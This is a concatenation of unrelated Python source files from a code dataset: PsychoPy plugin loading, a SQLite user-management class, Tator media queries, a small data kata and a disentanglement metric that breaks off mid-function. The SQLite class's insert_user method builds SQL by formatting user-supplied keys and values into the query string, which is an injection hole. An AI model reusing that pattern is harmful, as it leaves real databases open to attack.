check if exists and valid\n if hasattr(imp, '__register__') and imp.__register__ is not None:\n if isinstance(imp.__register__, str):\n if hasattr(imp, imp.__register__): # local to module\n func = getattr(imp, imp.__register__)\n else: # could be a FQN?\n func = resolveObjectFromName(\n imp.__register__, error=False)\n # check if the reference object is callable\n if not callable(func):\n logging.error(\n \"Plugin `{}` module defines `__register__` but \"\n \"the specified object is not a callable type. \"\n \"Skipping.\".format(plugin))\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n elif callable(imp.__register__): # a function was supplied\n func = imp.__register__\n else:\n logging.error(\n \"Plugin `{}` module defines `__register__` but \"\n \"is not `str` or callable type. Skipping.\".format(\n plugin))\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n # call the register function with arguments\n func(*args, **kwargs)\n\n # Ensure that we are not wholesale replacing an existing module.\n # We want plugins to be explicit about what they are changing.\n # This makes sure plugins play nice with each other, only\n # making changes to existing code where needed. However, plugins\n # are allowed to add new modules to the namespaces of existing\n # ones.\n if hasattr(targObj, attr):\n # handle what to do if an attribute exists already here ...\n if inspect.ismodule(getattr(targObj, attr)):\n logging.error(\n \"Plugin `{}` attempted to override module `{}`.\".format(\n plugin, fqn + '.' + attr))\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n try:\n ep = ep.load() # load the entry point\n except ImportError:\n logging.error(\n \"Failed to load entry point `{}` of plugin `{}`. \"\n \" Skipping.\".format(str(ep), plugin))\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n # If we get here, the entry point is valid and we can safely add it\n # to PsychoPy's namespace.\n validEntryPoints[fqn].append((targObj, attr, ep))\n\n # Assign entry points that have been successfully loaded. We defer\n # assignment until all entry points are deemed valid to prevent plugins\n # from being partially loaded.\n for fqn, vals in validEntryPoints.items():\n for targObj, attr, ep in vals:\n # add the object to the module or unbound class\n setattr(targObj, attr, ep)\n logging.debug(\n \"Assigning to entry point `{}` to `{}`.\".format(\n ep.__name__, fqn + '.' + attr))\n\n # --- handle special cases ---\n if fqn == 'psychopy.visual.backends': # if window backend\n _registerWindowBackend(attr, ep)\n elif fqn == 'psychopy.experiment.components': # if component\n _registerBuilderComponent(ep)\n\n # Retain information about the plugin's entry points, we will use this for\n # conflict resolution.\n _loaded_plugins_[plugin] = entryMap\n\n # If we made it here on a previously failed plugin, it was likely fixed and\n # can be removed from the list.\n if plugin not in _failed_plugins_:\n try:\n _failed_plugins_.remove(plugin)\n except ValueError:\n pass\n\n return True\n\n\ndef requirePlugin(plugin):\n \"\"\"Require a plugin to be already loaded.\n\n This function can be used to ensure if a plugin has already been loaded and\n is ready for use, raising an exception and ending the session if not.\n\n This function compliments :func:`loadPlugin`, which does not halt the\n application if plugin fails to load. This allows PsychoPy to continue\n working, giving the user a chance to deal with the problem (either by\n disabling or fixing the plugins). However, :func:`requirePlugin` can be used\n to guard against undefined behavior caused by a failed or partially loaded\n plugin by raising an exception before any code that uses the plugin's\n features is executed.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to require. This usually refers to the package\n or project name.\n\n Raises\n ------\n RuntimeError\n Plugin has not been previously loaded this session.\n\n See Also\n --------\n loadPlugin : Load a plugin into the current session.\n\n Examples\n --------\n Ensure plugin `psychopy-plugin` is loaded at this point in the session::\n\n requirePlugin('psychopy-plugin') # error if not loaded\n\n You can catch the error and try to handle the situation by::\n\n try:\n requirePlugin('psychopy-plugin')\n except RuntimeError:\n # do something about it ...\n\n \"\"\"\n if not isPluginLoaded(plugin):\n raise RuntimeError('Required plugin `{}` has not been loaded.')\n\n\ndef startUpPlugins(plugins, add=True, verify=True):\n \"\"\"Specify which plugins should be loaded automatically when a PsychoPy\n session starts.\n\n This function edits ``psychopy.preferences.prefs.general['startUpPlugins']``\n and provides a means to verify if entries are valid. The PsychoPy session\n must be restarted for the plugins specified to take effect.\n\n If using PsychoPy as a library, this function serves as a convenience to\n avoid needing to explicitly call :func:`loadPlugin` every time to use your\n favorite plugins.\n\n Parameters\n ----------\n plugins : `str`, `list` or `None`\n Name(s) of plugins to have load on startup.\n add : bool\n If `True` names of plugins will be appended to `startUpPlugins` unless a\n name is already present. If `False`, `startUpPlugins` will be set to\n `plugins`, overwriting the previous value. If `add=False` and\n `plugins=[]` or `plugins=None`, no plugins will be loaded in the next\n session.\n verify : bool\n Check if `plugins` are installed and have valid entry points to\n PsychoPy. Raises an error if any are not. This prevents undefined\n behavior arsing from invalid plugins being loaded in the next session.\n If `False`, plugin names will be added regardless if they are installed\n or not.\n\n Raises\n ------\n RuntimeError\n If `verify=True`, any of `plugins` is not installed or does not have\n entry points to PsychoPy. This is raised to prevent issues in future\n sessions where invalid plugins are written to the config file and are\n automatically loaded.\n\n Warnings\n --------\n Do not use this function within the builder or coder GUI! Use the plugin\n dialog to specify which plugins to load on startup. Only use this function\n when using PsychoPy as a library!\n\n Examples\n --------\n Adding plugins to load on startup::\n\n startUpPlugins(['plugin1', 'plugin2'])\n\n Clearing the startup plugins list, no plugins will be loaded automatically\n at the start of the next session::\n\n plugins.startUpPlugins([], add=False)\n # or ..\n plugins.startUpPlugins(None, add=False)\n\n If passing `None` or an empty list with `add=True`, the present value of\n `prefs.general['startUpPlugins']` will remain as-is.\n\n \"\"\"\n # check if there is a config entry\n if 'startUpPlugins' not in prefs.general.keys():\n logging.warning(\n 'Config file does not define `startUpPlugins`. Skipping.')\n\n return\n\n # if a string is specified\n if isinstance(plugins, str):\n plugins = [plugins]\n\n # if the list is empty or None, just clear\n if not plugins or plugins is None:\n if not add: # adding nothing gives the original\n prefs.general['startUpPlugins'] = []\n prefs.saveUserPrefs()\n\n return\n\n # check if the plugins are installed before adding to `startUpPlugins`\n installedPlugins = listPlugins()\n if verify:\n notInstalled = [plugin not in installedPlugins for plugin in plugins]\n if any(notInstalled):\n missingIdx = [i for i, x in enumerate(notInstalled) if x]\n errStr = '' # build up an error string\n for i, idx in enumerate(missingIdx):\n if i < len(missingIdx) - 1:\n errStr += '`{}`, '.format(plugins[idx])\n else:\n errStr += '`{}`;'.format(plugins[idx])\n\n raise RuntimeError(\n \"Cannot add startup plugin(s): {} either not installed or has \"\n \"no PsychoPy entry points.\".format(errStr))\n\n if add: # adding plugin names to existing list\n for plugin in plugins:\n if plugin not in prefs.general['startUpPlugins']:\n prefs.general['startUpPlugins'].append(plugin)\n else:\n prefs.general['startUpPlugins'] = plugins # overwrite\n\n prefs.saveUserPrefs() # save after loading\n\n\ndef pluginMetadata(plugin):\n \"\"\"Get metadata from a plugin package.\n\n Reads the package's PKG_INFO and gets fields as a dictionary. Only packages\n that have valid entry points to PsychoPy can be queried.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to retrieve metadata from.\n\n Returns\n -------\n dict\n Metadata fields.\n\n \"\"\"\n installedPlugins = listPlugins()\n if plugin not in installedPlugins:\n raise ModuleNotFoundError(\n \"Plugin `{}` is not installed or does not have entry points for \"\n \"PsychoPy.\".format(plugin))\n\n pkg = pkg_resources.get_distribution(plugin)\n metadata = pkg.get_metadata(pkg.PKG_INFO)\n\n metadict = {}\n for line in metadata.split('\\n'):\n if not line:\n continue\n\n line = line.strip().split(': ')\n if len(line) == 2:\n field, value = line\n metadict[field] = value\n\n return metadict\n\n\ndef pluginEntryPoints(plugin, parse=False):\n \"\"\"Get the entry point mapping for a specified plugin.\n\n You must call `scanPlugins` before calling this function to get the entry\n points for a given plugin.\n\n Note this function is intended for internal use by the PsychoPy plugin\n system only.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to get advertised entry points.\n parse : bool\n Parse the entry point specifiers and convert them to fully-qualified\n names.\n\n Returns\n -------\n dict\n Dictionary of target groups/attributes and entry points objects.\n\n \"\"\"\n global _installed_plugins_\n if plugin in _installed_plugins_.keys():\n if not parse:\n return _installed_plugins_[plugin]\n else:\n toReturn = {}\n for group, val in _installed_plugins_[plugin].items():\n if group not in toReturn.keys():\n toReturn[group] = {} # create a new group entry\n\n for attr, ep in val.items():\n # parse the entry point specifier\n ex = '.'.join(str(ep).split(' = ')[1].split(':')) # make fqn\n toReturn[group].update({attr: ex})\n\n return toReturn\n\n logging.error(\"Cannot retrieve entry points for plugin `{}`, either not \"\n \" installed or reachable.\")\n\n return None\n\n\ndef _registerWindowBackend(attr, ep):\n \"\"\"Make an entry point discoverable as a window backend.\n\n This allows it the given entry point to be used as a window backend by\n specifying `winType`. All window backends must be subclasses of `BaseBackend`\n and define a `winTypeName` attribute. The value of `winTypeName` will be\n used for selecting `winType`.\n\n This function is called by :func:`loadPlugin`, it should not be used for any\n other purpose.\n\n Parameters\n ----------\n attr : str\n Attribute name the backend is being assigned in\n 'psychopy.visual.backends'.\n ep : ModuleType of ClassType\n Entry point which defines an object with window backends. Can be a class\n or module. If a module, the module will be scanned for subclasses of\n `BaseBackend` and they will be added as backends.\n\n \"\"\"\n # get reference to the backend class\n fqn = 'psychopy.visual.backends'\n backend = resolveObjectFromName(\n fqn, resolve=(fqn not in sys.modules), error=False)\n\n if backend is None:\n logging.error(\"Failed to resolve name `{}`.\".format(fqn))\n return # something weird happened, just exit\n\n # if a module, scan it for valid backends\n foundBackends = {}\n if inspect.ismodule(ep): # if the backend is a module\n for attrName in dir(ep):\n _attr = getattr(ep, attrName)\n if not inspect.isclass(_attr): # skip if not class\n continue\n if not issubclass(_attr, backend.BaseBackend): # not backend\n continue\n # check if the class defines a name for `winType`\n if not hasattr(_attr, 'winTypeName'): # has no backend name\n continue\n # found something that can be a backend\n foundBackends[_attr.winTypeName] = '.' + attr + '.' + attrName\n logging.debug(\n \"Registered window backend class `{}` for `winType={}`.\".format(\n foundBackends[_attr.winTypeName], _attr.winTypeName))\n elif inspect.isclass(ep): # backend passed as a class\n if not issubclass(ep, backend.BaseBackend):\n return\n if not hasattr(ep, 'winTypeName'):\n return\n foundBackends[ep.winTypeName] = '.' + attr\n logging.debug(\n \"Registered window backend class `{}` for `winType={}`.\".format(\n foundBackends[ep.winTypeName], ep.winTypeName))\n\n backend.winTypes.update(foundBackends) # update installed backends\n\n\ndef _registerBuilderComponent(ep):\n \"\"\"Register a PsychoPy builder component module.\n\n This function is called by :func:`loadPlugin` when encountering an entry\n point group for :mod:`psychopy.experiment.components`. It searches the\n module at the entry point for sub-classes of `BaseComponent` and registers\n it as a builder component. It will also search the module for any resources\n associated with the component (eg. icons and tooltip text) and register them\n for use.\n\n Builder component modules in plugins should follow the conventions and\n structure of a normal, stand-alone components. Any plugins that adds\n components to PsychoPy must be registered to load on startup.\n\n This function is called by :func:`loadPlugin`, it should not be used for any\n other purpose.\n\n Parameters\n ----------\n module : ModuleType\n Module containing the builder component to register.\n\n \"\"\"\n if not inspect.ismodule(ep): # not a module\n return\n\n # give a default category\n if not hasattr(ep, 'categories'):\n ep.categories = ['Custom']\n\n # check if module contains components\n for attrib in dir(ep):\n # name and reference to component class\n name = attrib\n cls = getattr(ep, attrib)\n\n if not inspect.isclass(cls):\n continue\n\n if not issubclass(cls, components.BaseComponent):\n continue\n\n components.pluginComponents[attrib] = getattr(ep, attrib)\n\n # skip if this class was imported, not defined here\n if ep.__name__ != components.pluginComponents[attrib].__module__:\n continue # class was defined in different module\n\n if hasattr(ep, 'tooltip'):\n components.tooltips[name] = ep.tooltip\n\n if hasattr(ep, 'iconFile'):\n components.iconFiles[name] = ep.iconFile\n\n # assign the module categories to the Component\n if not hasattr(components.pluginComponents[attrib], 'categories'):\n components.pluginComponents[attrib].categories = ['Custom']\n","repo_name":"psychopy/versions","sub_path":"psychopy/plugins/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":36417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"29858164696","text":"#!/usr/bin/env python3\r\nimport os\r\nfrom pathlib import Path\r\nimport config\r\nimport sqlite3\r\nimport logging\r\nimport logging_messages as lm\r\nfrom collections import OrderedDict\r\nimport json\r\nimport time\r\n\r\n\r\nlogging.basicConfig(\r\n format='%(asctime)s %(levelname)-8s %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n level=logging.DEBUG,\r\n filename=os.path.basename(__file__) + time.strftime(\"-%Y-%m-%d.log\"))\r\n\r\n\r\nsql_create_table_query = 'CREATE TABLE IF NOT EXISTS {} ('.format(config.TABLE_NAME) +\\\r\n ', '.join(x[0] + ' ' + x[1] for x in config.DB_COLUMNS) + \\\r\n ', PRIMARY KEY({}))'.format(config.DB_PRIMARY_KEY)\r\n\r\n\r\ndef get_search_values(input_value):\r\n return input_value.split(config.MULTIPLE_VALUE_DELIMETER)\r\n\r\n\r\ndef get_search_parameters(search_filters):\r\n \"\"\" Take the input search filter and\r\n extract the valid (according to the DB schema) search parameters\r\n while identifying the invalid ones (and ignoring them, not blocking the query).\r\n\r\n :param search_filters: the user's URL search parameters, e.g.: '{email:USER_EMAIL1,EMAIL2, name:USER_NAME}'\r\n :type search_filters: dict\r\n\r\n :return:\r\n ignore_keys: the user's inserted search parameters which are invalid, as not found in the DB schema\r\n keep_keys: the valid search keys specified by the user, pre-formatted for a SQL query\r\n keep_values: the valid search values specified by the user, pre-formatted for a SQL query\r\n :rtype: list\r\n \"\"\"\r\n ignore_keys = []\r\n keep_keys = []\r\n keep_values = []\r\n\r\n if search_filters:\r\n for key in search_filters.keys():\r\n if key not in config.DB_ATTRIBUTES:\r\n ignore_keys.append(key)\r\n else:\r\n search_values = get_search_values(str(search_filters[key]))\r\n search_values_length = len(search_values)\r\n keep_values.extend(search_values)\r\n key_to_append = key + ' = ?'\r\n if search_values_length > 1:\r\n key_to_append = '({})'.format(' OR '.join(search_values_length*[key_to_append]))\r\n keep_keys.append(key_to_append)\r\n return ignore_keys, keep_keys, keep_values\r\n\r\n\r\nclass DbManager:\r\n def __init__(self):\r\n # Check if db folder exists, else create it\r\n Path(config.DB.get('path')).mkdir(parents=True, exist_ok=True)\r\n # Connect to local db\r\n self.conn = sqlite3.connect(os.path.join(config.DB.get('path'), config.DB.get('name')), check_same_thread=False)\r\n\r\n # Create table if not exists\r\n try:\r\n self.c = self.conn.cursor()\r\n self.c.execute(sql_create_table_query)\r\n except sqlite3.Error as e:\r\n logging.error(e)\r\n\r\n def __del__(self):\r\n self.conn.close()\r\n\r\n def get_users(self, search_filters=None):\r\n logging.info(lm.ACTION_REQUESTED.format('GET'))\r\n\r\n all_columns = config.DB_ATTRIBUTES\r\n sql_select_query = 'SELECT * FROM {}'.format(config.TABLE_NAME)\r\n\r\n keys_to_ignore, sql_search_params, sql_search_values = get_search_parameters(search_filters)\r\n logging.debug(lm.DATA_STRUCTURES.format(keys_to_ignore, sql_search_params, sql_search_values))\r\n\r\n if len(sql_search_params):\r\n sql_select_query += ' WHERE ' + ' AND '.join(sql_search_params)\r\n\r\n users = {}\r\n try:\r\n logging.debug([sql_select_query, tuple(sql_search_values)])\r\n rows = self.c.execute(sql_select_query, tuple(sql_search_values))\r\n for row in rows:\r\n user = OrderedDict(zip(all_columns, list(row)))\r\n users[user.get(config.DB_PRIMARY_KEY)] = user\r\n except sqlite3.Error as e:\r\n logging.error(e)\r\n return(str(e))\r\n\r\n return json.dumps(users), keys_to_ignore\r\n\r\n def insert_user(self, json_user):\r\n logging.info(lm.ACTION_REQUESTED.format('INSERT'))\r\n\r\n sql_insert_query = \"INSERT INTO {} ({}) VALUES({})\".format(config.TABLE_NAME,\r\n ', '.join(\"'{0}'\".format(k) for k in list(json_user.keys())),\r\n ', '.join(\"'{0}'\".format(v) for v in list(json_user.values())))\r\n try:\r\n logging.debug(sql_insert_query)\r\n self.c.execute(sql_insert_query)\r\n last_id = self.c.lastrowid\r\n self.conn.commit()\r\n except sqlite3.Error as e:\r\n logging.error(e)\r\n return(str(e))\r\n return last_id\r\n\r\n def update_user(self, user_id, update_filter):\r\n if not user_id:\r\n logging.debug(lm.NO_USER_ID)\r\n return lm.NO_USER_ID\r\n\r\n logging.info(lm.ACTION_REQUESTED_FOR_ID.format('UPDATE', str(user_id)))\r\n sql_update_query = \"UPDATE {} SET \".format(config.TABLE_NAME)\r\n\r\n keys_to_ignore, sql_update_params, sql_update_values = get_search_parameters(update_filter)\r\n logging.debug(lm.DATA_STRUCTURES.format(keys_to_ignore, sql_update_params, sql_update_values))\r\n\r\n if not sql_update_params:\r\n return lm.INVALID_PARAM.format(','.join(keys_to_ignore))\r\n\r\n sql_update_query += ', '.join(sql_update_params) + ' WHERE {} = ?'.format(config.DB_PRIMARY_KEY)\r\n sql_update_values.append(user_id)\r\n\r\n try:\r\n logging.debug([sql_update_query, tuple(sql_update_values)])\r\n self.c.execute(sql_update_query, tuple(sql_update_values))\r\n self.conn.commit()\r\n except sqlite3.Error as e:\r\n logging.error(e)\r\n return(str(e))\r\n return int(user_id)\r\n\r\n def delete_user(self, user_id):\r\n if not user_id:\r\n logging.debug(lm.NO_USER_ID)\r\n return lm.NO_USER_ID\r\n\r\n logging.info(lm.ACTION_REQUESTED_FOR_ID.format('DELETE', user_id))\r\n sql_delete_query = \"DELETE from {} WHERE {} = ?\".format(config.TABLE_NAME, config.DB_PRIMARY_KEY)\r\n try:\r\n logging.debug([sql_delete_query, tuple([user_id])])\r\n self.c.execute(sql_delete_query, tuple([user_id]))\r\n self.conn.commit()\r\n except sqlite3.Error as e:\r\n logging.error(e)\r\n return(str(e))\r\n return int(user_id)\r\n","repo_name":"mmarcomaio/python_rest_api_server","sub_path":"db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28037462500","text":"\"\"\" TODO: add documentation for this \"\"\"\nimport logging\nfrom urllib import parse as urllib_parse\n\nimport json\nimport base64\nimport uuid\n\nfrom django.db.models import Q\nfrom django.http import Http404\nfrom django.db.models.functions import Cast\nfrom django.db.models import UUIDField, TextField, F\n\nfrom ..models import LocalizationType, Media, MediaType, Localization, Section, State, StateType\n\nfrom ..schema._attributes import related_keys\nfrom ._attribute_query import (\n _related_search,\n get_attribute_filter_ops,\n get_attribute_psql_queryset,\n get_attribute_psql_queryset_from_query_obj,\n supplied_name_to_field,\n _look_for_section_uuid,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_archived_filter(params):\n archive_lifecycle = params.get(\"archive_lifecycle\", \"all\")\n if archive_lifecycle == \"archived\":\n return [\"to_archive\", \"archived\", \"to_live\"]\n if archive_lifecycle == \"all\":\n return None\n if archive_lifecycle == \"live\":\n return [\"live\"]\n\n raise ValueError(\n f\"Received invalid value '{archive_lifecycle}' for 'archive_lifecycle'. Valid values are \"\n f\"['archived', 'live', 'all'].\"\n )\n\n\ndef _get_media_psql_queryset(project, filter_ops, params):\n \"\"\"Constructs a psql queryset.\"\"\"\n # Get query parameters.\n media_id = params.get(\"media_id\")\n media_id_put = params.get(\"ids\") # PUT request only\n localization_ids = params.get(\"localization_ids\") # PUT request only\n state_ids = params.get(\"state_ids\") # PUT request only\n filter_type = params.get(\"type\")\n name = params.get(\"name\")\n dtype = params.get(\"dtype\")\n md5 = params.get(\"md5\")\n gid = params.get(\"gid\")\n uid = params.get(\"uid\")\n after = params.get(\"after\")\n after_name = params.get(\"after_name\")\n start = params.get(\"start\")\n stop = params.get(\"stop\")\n section_id = params.get(\"section\")\n archive_states = _get_archived_filter(params)\n elemental_id = params.get(\"elemental_id\")\n\n qs = Media.objects.filter(project=project, deleted=False)\n media_ids = []\n if media_id_put is not None:\n media_ids += media_id_put\n if media_id is not None:\n media_ids += media_id\n if state_ids is not None:\n media_ids += list(\n State.media.through.objects.filter(state__in=state_ids)\n .values_list(\"media_id\", flat=True)\n .distinct()\n )\n if media_ids:\n qs = qs.filter(pk__in=media_ids)\n\n if localization_ids is not None:\n qs = qs.filter(localization__in=localization_ids).distinct()\n\n if name is not None:\n qs = qs.filter(name__iexact=name)\n\n if elemental_id is not None:\n # Django 3.X has a bug where UUID fields aren't escaped properly\n # Use .extra to manually validate the input is UUID\n # Then construct where clause manually.\n safe = uuid.UUID(elemental_id)\n qs = qs.extra(where=[f\"elemental_id='{str(safe)}'\"])\n\n if dtype is not None:\n qs = qs.filter(type__dtype=dtype)\n\n if md5 is not None:\n qs = qs.filter(md5=md5)\n\n if gid is not None:\n qs = qs.filter(gid=gid)\n\n if uid is not None:\n qs = qs.filter(uid=uid)\n\n if after is not None:\n qs = qs.filter(pk__gt=after)\n\n if after_name is not None:\n qs = qs.filter(name__gt=after_name)\n\n if archive_states is not None:\n qs = qs.filter(archive_state__in=archive_states)\n\n relevant_state_type_ids = StateType.objects.filter(project=project)\n relevant_localization_type_ids = LocalizationType.objects.filter(project=project)\n if filter_type is not None:\n relevant_state_type_ids = relevant_state_type_ids.filter(media__in=[filter_type])\n relevant_localization_type_ids = relevant_localization_type_ids.filter(\n media__in=[filter_type]\n )\n qs = get_attribute_psql_queryset(\n MediaType.objects.get(pk=filter_type), qs, params, filter_ops\n )\n qs = qs.filter(type=filter_type)\n elif filter_ops or params.get(\"float_array\", None):\n queries = []\n for entity_type in MediaType.objects.filter(project=project):\n sub_qs = get_attribute_psql_queryset(entity_type, qs, params, filter_ops)\n if sub_qs:\n queries.append(sub_qs.filter(type=entity_type))\n else:\n queries.append(qs.filter(pk=-1)) # no matches\n logger.info(f\"Joining {len(queries)} queries together.\")\n\n sub_qs = queries.pop()\n if queries:\n query = Q(pk__in=sub_qs)\n for r in queries:\n query = query | Q(pk__in=r)\n qs = qs.filter(query)\n else:\n qs = sub_qs\n\n # Do a related query\n logger.info(params)\n if any([x in params for x in related_keys if x.startswith(\"related_\")]):\n related_state_types = StateType.objects.filter(pk__in=relevant_state_type_ids)\n related_localization_types = LocalizationType.objects.filter(\n pk__in=relevant_localization_type_ids\n )\n logger.info(f\"Related Query on {related_localization_types} + {related_state_types}\")\n matches = [x for x in related_keys if x in params]\n faux_params = {key.replace(\"related_\", \"\"): params[key] for key in matches}\n logger.info(faux_params)\n related_matches = []\n for entity_type in related_state_types:\n faux_filter_ops = get_attribute_filter_ops(faux_params, entity_type)\n if faux_filter_ops:\n related_matches.append(\n get_attribute_psql_queryset(\n entity_type,\n State.objects.filter(project=project),\n faux_params,\n faux_filter_ops,\n )\n )\n for entity_type in related_localization_types:\n faux_filter_ops = get_attribute_filter_ops(faux_params, entity_type)\n if faux_filter_ops:\n related_matches.append(\n get_attribute_psql_queryset(\n entity_type,\n Localization.objects.filter(project=project),\n faux_params,\n faux_filter_ops,\n )\n )\n if related_matches:\n related_match = related_matches.pop()\n query = Q(pk__in=related_match.values(\"media\"))\n for r in related_matches:\n query = query | Q(pk__in=r.values(\"media\"))\n qs = qs.filter(query).distinct()\n\n if section_id:\n section = Section.objects.filter(pk=section_id)\n if not section.exists():\n raise Http404\n\n section_uuid = section[0].tator_user_sections\n if section_uuid:\n qs = _look_for_section_uuid(qs, section_uuid)\n\n if section[0].object_search:\n qs = get_attribute_psql_queryset_from_query_obj(qs, section[0].object_search)\n\n if section[0].related_object_search:\n qs = _related_search(\n qs,\n project,\n relevant_state_type_ids,\n relevant_localization_type_ids,\n section[0].related_object_search,\n )\n\n if params.get(\"encoded_related_search\"):\n search_obj = json.loads(base64.b64decode(params.get(\"encoded_related_search\")).decode())\n qs = _related_search(\n qs, project, relevant_state_type_ids, relevant_localization_type_ids, search_obj\n )\n\n # Used by GET queries\n if params.get(\"encoded_search\"):\n search_obj = json.loads(base64.b64decode(params.get(\"encoded_search\")).decode())\n qs = get_attribute_psql_queryset_from_query_obj(qs, search_obj)\n\n if params.get(\"object_search\"):\n qs = get_attribute_psql_queryset_from_query_obj(qs, params.get(\"object_search\"))\n\n if params.get(\"sort_by\", None):\n sortables = [supplied_name_to_field(x) for x in params.get(\"sort_by\")]\n qs = qs.order_by(*sortables)\n else:\n qs = qs.order_by(\"name\", \"id\")\n\n if stop is not None:\n qs = qs[:stop]\n if start is not None:\n qs = qs[start:]\n\n logger.info(qs.query)\n logger.info(qs.explain())\n\n return qs\n\n\ndef _get_section_and_params(project, params):\n filter_type = params.get(\"type\")\n filter_ops = []\n if filter_type:\n types = MediaType.objects.filter(pk=filter_type)\n else:\n types = MediaType.objects.filter(project=project)\n for entity_type in types:\n filter_ops.extend(get_attribute_filter_ops(params, entity_type))\n\n return filter_ops\n\n\ndef get_media_queryset(project, params):\n filter_ops = _get_section_and_params(project, params)\n # If using PSQL, construct the queryset.\n qs = _get_media_psql_queryset(project, filter_ops, params)\n return qs\n\n\ndef get_media_count(project, params):\n # Determine whether to use ES or not.\n qs = get_media_queryset(project, params)\n return qs.count()\n\n\ndef query_string_to_media_ids(project, url):\n \"\"\"TODO: add documentation for this\"\"\"\n params = dict(urllib_parse.parse_qsl(urllib_parse.urlsplit(url).query))\n media_ids = get_media_queryset(project, params).values_list(\"id\", flat=True)\n return media_ids\n","repo_name":"cvisionai/tator","sub_path":"api/main/rest/_media_query.py","file_name":"_media_query.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"4591521941","text":"import re\n\nimport pandas as pd\n\n\ndef get_smallest_spread(first_series, second_series):\n first_series_cleaned = first_series.apply(_remove_non_alphanumeric)\n second_series_cleaned = second_series.apply(_remove_non_alphanumeric)\n\n spread_series = abs(\n first_series_cleaned.astype(float) - second_series_cleaned.astype(float)\n )\n minimum_spread = spread_series.dropna().min()\n\n return spread_series.tolist().index(minimum_spread)\n\n\ndef _remove_non_alphanumeric(text):\n try:\n pattern = re.compile(\"\\W\")\n return re.sub(pattern, \"\", text)\n except:\n return text\n\n\n# reading the data\nweather_data = pd.read_fwf(\"/Users/isabel/Downloads/weather.dat\", sep=\" \")\nfootball_data = pd.read_fwf(\"/Users/isabel/Downloads/football.dat\", sep=\" \").drop(\n columns=[\"Unnamed: 0\", \"Unnamed: 7\"]\n)\n\nprint(\n \"The day with the smallest spread between highest and lowest temperatures is: {}\".format(\n get_smallest_spread(weather_data[\"MxT\"], weather_data[\"MnT\"])\n )\n)\nprint(\n \"The football team with the smallest spread between for and against goals is: {}\".format(\n get_smallest_spread(football_data[\"F\"], football_data[\"A\"])\n )\n)\n","repo_name":"isacsmith/katas","sub_path":"katas/data_munging.py","file_name":"data_munging.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13807217149","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom absl import logging\nfrom disentanglement_lib.evaluation.metrics import utils\nimport numpy as np\nimport gin.tf\n\n\n@gin.configurable(\n \"irs\",\n blacklist=[\"ground_truth_data\", \"representation_function\", \"random_state\",\n \"artifact_dir\"])\ndef compute_irs(ground_truth_data,\n representation_function,\n random_state,\n artifact_dir=None,\n diff_quantile=0.99,\n num_train=gin.REQUIRED,\n batch_size=gin.REQUIRED):\n \"\"\"Computes the Interventional Robustness Score.\n\n Args:\n ground_truth_data: GroundTruthData to be sampled from.\n representation_function: Function that takes observations as input and\n outputs a dim_representation sized representation for each observation.\n random_state: Numpy random state used for randomness.\n artifact_dir: Optional path to directory where artifacts can be saved.\n diff_quantile: Float value between 0 and 1 to decide what quantile of diffs\n to select (use 1.0 for the version in the paper).\n num_train: Number of points used for training.\n batch_size: Batch size for sampling.\n\n Returns:\n Dict with IRS and number of active dimensions.\n \"\"\"\n del artifact_dir\n logging.info(\"Generating training set.\")\n mus, ys = utils.generate_batch_factor_code(ground_truth_data,\n representation_function, num_train,\n random_state, batch_size)\n assert mus.shape[1] == num_train\n\n ys_discrete = utils.make_discretizer(ys)\n active_mus = _drop_constant_dims(mus)\n\n if not active_mus.any():\n irs_score = 0.0\n else:\n irs_score = scalable_disentanglement_score(ys_discrete.T, active_mus.T,\n diff_quantile)[\"avg_score\"]\n\n score_dict = {}\n score_dict[\"IRS\"] = irs_score\n score_dict[\"num_active_dims\"] = np.sum(active_mus)\n return score_dict\n\n\ndef _drop_constant_dims(ys):\n \"\"\"Returns a view of the matrix `ys` with dropped constant rows.\"\"\"\n ys = np.asarray(ys)\n if ys.ndim != 2:\n raise ValueError(\"Expecting a matrix.\")\n\n variances = ys.var(axis=1)\n active_mask = variances > 0.\n return ys[active_mask, :]\n\n\ndef scalable_disentanglement_score(gen_factors, latents, diff_quantile=0.99):\n \"\"\"Computes IRS scores of a dataset.\n\n Assumes no noise in X and crossed generative factors (i.e. one sample per\n combination of gen_factors). Assumes each g_i is an equally probable\n realization of g_i and all g_i are independent.\n\n Args:\n gen_factors: Numpy array of shape (num samples, num generative factors),\n matrix of ground truth generative factors.\n latents: Numpy array of shape (num samples, num latent dimensions), matrix\n of latent variables.\n diff_quantile: Float value between 0 and 1 to decide what quantile of diffs\n to select (use 1.0 for the version in the paper).\n\n Returns:\n Dictionary with IRS scores.\n \"\"\"\n num_gen = gen_factors.shape[1]\n num_lat = latents.shape[1]\n\n # Compute normalizer.\n max_deviations = np.max(np.abs(latents - latents.mean(axis=0)), axis=0)\n cum_deviations = np.zeros([num_lat, num_gen])\n for i in range(num_gen):\n unique_factors = np.unique(gen_factors[:, i], axis=0)\n assert unique_factors.ndim == 1\n num_distinct_factors = unique_factors.shape[0]\n for k in range(num_distinct_factors):\n # Compute E[Z | g_i].\n match = gen_factors[:, i] == unique_factors[k]\n e_loc = np.mean(latents[match, :], axis=0)\n\n # Difference of each value within that group of constant g_i to its mean.\n diffs = np.abs(latents[match, :] - e_loc)\n max_diffs = np.percentile(diffs, q=diff_quantile*100, axis=0)\n cum_deviations[:, i] += max_diffs\n cum_deviations[:, i] /= num_distinct_factors\n 